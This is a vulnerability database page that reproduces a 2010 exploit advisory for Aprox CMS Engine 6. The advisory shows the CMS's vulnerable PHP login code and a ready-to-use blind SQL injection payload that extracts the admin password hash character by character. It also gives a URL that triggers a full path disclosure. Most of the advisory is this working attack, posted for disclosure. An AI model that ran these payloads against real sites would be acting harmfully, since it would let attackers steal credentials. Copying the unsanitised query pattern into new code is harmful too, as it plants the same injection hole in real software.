Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Aprox CMS Engine 6 Path Disclosure / SQL Injection

🗓️ 04 Oct 2010 00:00:00Reported by Stephan SattlerType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 18 Views

Aprox CMS Engine V6 Multiple Vulnerabilities - SQL Injection, Path Disclosur

Code
`# Exploit Title: Aprox CMS Engine V6 Multiple Vulnerabilities  
# Date: 03.10.2010  
# Author: Stephan Sattler // http://www.solidmedia.de  
# Software Website: http://www.aprox.de/  
# Software Link: http://www.aprox.de/index.php?page=d&application=zip&dateiname=AproxEngine_v6  
# Version: 6  
  
  
[ Vulnerability 1]  
  
# Vulnerable Code:  
  
sql_login.inc line 63-91  
  
if (isset($_GET["action"]) && ($_GET["action"] != "")){$action = $_GET["action"];}  
unset($password);  
if (isset($_POST["password"]) && ($_POST["password"] != "")){$password = md5($_POST["password"]);}  
unset($login);  
if (isset($_POST["login"]) && ($_POST["login"] != "")){$login = $_POST["login"];}  
  
if (($login=="") or ($password=="")) {echo "Angegeben nicht vollständig!";die;}  
  
$db = mysql_connect(serverhost, user, pass, database);  
$abfrage = "select * from ". suffix ."users where login = '$login'";  
$res = mysql_db_query(database, "$abfrage");  
  
$num = mysql_num_rows($res);  
#echo $num;  
if ($num >0)  
{  
#echo "user gefunden,<br>";  
$pass = mysql_result($res, 0, 'password');  
if ($password == $pass)  
{  
echo "Alles OK!!!";  
$name = mysql_result($res, 0, 'real_name');  
  
$_SESSION["name"] = $name;  
$_SESSION["login"] = $login;  
$_SESSION["pass"] = $pass;  
  
$login_gepruefter_user = mysql_result($res, 0, 'gepr_mitglied');  
$_SESSION["gepruefter_user"] = $login_gepruefter_user;  
  
  
  
  
# Explanation:  
  
$_POST["login"] isn't sanitized before executing the database query.  
An attacker can use this for a blind SQL injection attack.  
  
  
# Exploiting the Vulnerability // PoC:  
  
URL: http://[site]/[path]/index.php?page=sql_login  
  
Postdata(Example for the admin user which is created after install):  
  
login=admin' and ascii(substring((SELECT concat(password) from aprox_users limit 0,1),1,1))>'100&password=passwort&Submit=Login  
  
->if login succeeds, the first character of the hash is greater than d(ascii 100).  
  
An attacker can insert his/her own login credentials and test it with them or do it with benchmark() without a user-account.  
Aprox stores failed logins in a Session so this won't prevent an attack.  
  
  
[Vulnerability 2]  
  
# Path Disclosure  
  
  
For Example: http://[site]/[path]/index.php?id=1 AnD 1=1  
will provoke an error so the full path will be presented to you.  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Oct 2010 00:00Current
0.5Low risk
Vulners AI Score0.5
aprox cms enginev6multiple vulnerabilitiessql injectionpath disclosureexploitvulnerable codeblind sql injectionpocsessionbenchmark
18